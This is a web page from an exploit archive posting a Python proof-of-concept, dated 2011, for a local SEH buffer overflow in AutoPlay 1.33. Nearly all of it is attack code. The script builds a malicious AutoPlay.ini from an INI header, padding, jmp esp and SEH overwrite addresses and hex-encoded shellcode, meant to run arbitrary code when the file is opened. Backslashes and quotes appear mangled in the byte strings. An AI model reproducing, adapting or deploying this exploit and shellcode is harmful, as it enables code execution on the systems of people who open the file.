Home / exploits AutoPlay 1.33 Buffer Overflow
Posted on 16 February 2011
#!/usr/bin/python # # # AutoPlay v1.33 (autoplay.ini) Local Buffer Overflow Exploit (SEH) # # # Vendor: Naugher Software # Product web page: http://www.naughter.com # Affected version: 1.33 # # Summary: AutoPlay is a shareware application used for making # autorun.ini files that can be edited and stored to compact disks. # # Desc: The program suffers from a buffer overflow vulnerability # when openinng autorun file (.ini), as a result of adding extra # bytes to parts of the edited file, giving the atackers the # possibility for an arbitrary code execution on the affected # system. Also the buffer overflow vulnerability allows the # atacker to bypass Structured Exception Handling (SEH) # protection mechanism. # # Tested on: Microsoft Windows 7 Ultimate # # Vulnerability discovered by: badc0re (Dame Jovanoski) # # # Advisory ID: ZSL-2011-4994 # Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2011-4994.php # # # 13.02.2011 # from struct import * import time f=open(“AutoPlay.ini”,”w”) shell=(“x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x61” “x28x38x56x83xebxfcxe2xf4x9dxc0x7cx56x61x28xb3x13” “x5dxa3x44x53x19x29xd7xddx2ex30xb3x09x41x29xd3x1f” “xeax1cxb3x57x8fx19xf8xcfxcdxacxf8x22x66xe9xf2x5b” “x60xeaxd3xa2x5ax7cx1cx52x14xcdxb3x09x45x29xd3x30” “xeax24x73xddx3ex34x39xbdxeax34xb3x57x8axa1x64x72” “x65xebx09x96x05xa3x78x66xe4xe8x40x5axeax68x34xdd” “x11x34x95xddx09x20xd3x5fxeaxa8x88x56x61x28xb3x3e” “x5dx77x09xa0x01x7exb1xaexe2xe8x43x06x09xd8xb2x52” “x3ex40xa0xa8xebx26x6fxa9x86x4bx59x3ax02x28x38x56”); head=(“x5bx47x65x6ex65x72x61x6cx5dx0dx0ax54x69x74x6cx65” “x3dx41x20x73x61x6dx70x6cx65x20x6fx66x20x77x68x61” “x74x20x41x75x74x6fx50x6cx61x79x20x63x61x6ex20x64” “x6fx21x0dx0ax49x63x6fx6ex3dx2ex5cx61x75x74x6fx70” “x6cx61x79x2ex69x63x6fx0dx0ax53x74x61x72x74x75x70” “x53x6fx75x6ex64x3dx2ex5cx64x72x75x6dx72x6fx6cx6c” “x2ex77x61x76x0dx0ax45x78x69x74x53x6fx75x6ex64x3d” “x2ex5cx65x78x70x6cx6fx64x65x2ex77x61x76x0dx0ax4e” “x75x6dx62x65x72x4fx66x42x75x74x74x6fx6ex73x3dx37” “x0dx0ax42x61x63x6bx67x72x6fx75x6ex64x42x69x74x6d” “x61x70x3dx2ex5cx73x70x6cx61x73x68x2ex6ax70x67x0d” “x0ax4ex75x6dx62x65x72x4fx66x43x6fx6dx62x6fx73x3d” “x31x0dx0ax0dx0ax5bx42x75x74x74x6fx6ex31x5dx0dx0a” “x43x6fx6dx6dx61x6ex64x54x79x70x65x3dx31x0dx0ax43” “x6fx6dx6dx61x6ex64x3dx65x78x70x6cx6fx72x65x72x2e” “x65x78x65x0dx0ax46x6cx79x62x79x53x6fx75x6ex64x3d” “x2ex5cx68x6fx76x65x72x73x65x6cx2ex77x61x76x0dx0a” “x4cx65x66x74x3dx38x33x0dx0ax54x6fx70x3dx31x33x0d” “x0ax54x65x78x74x43x6fx6cx6fx72x3dx32x35x35x2cx30” “x2cx30x0dx0ax48x69x67x68x6cx69x67x68x74x43x6fx6c” “x6fx72x3dx32x35x35x2cx32x35x35x2cx30x0dx0ax43x61” “x70x74x69x6fx6ex3dx52x75x6ex20x57x69x6ex64x6fx77” “x73x20x45x78x70x6cx6fx72x65x72x0dx0ax46x6fx6ex74” “x53x69x7ax65x3dx32x34x0dx0ax46x6fx6ex74x4ex61x6d” “x65x3d”) junk=”x41”*32 junk1=”x41”*92 nseh=”xebx06x90x90” seh=”x62xcex86x7c” # pop pop ret esp=”x7bx46x86x7c” # jmp esp try: f.write(head+junk+esp+junk1+nseh+seh+shell) f.close() print(“File created”) except: print(“File cannot be created”)
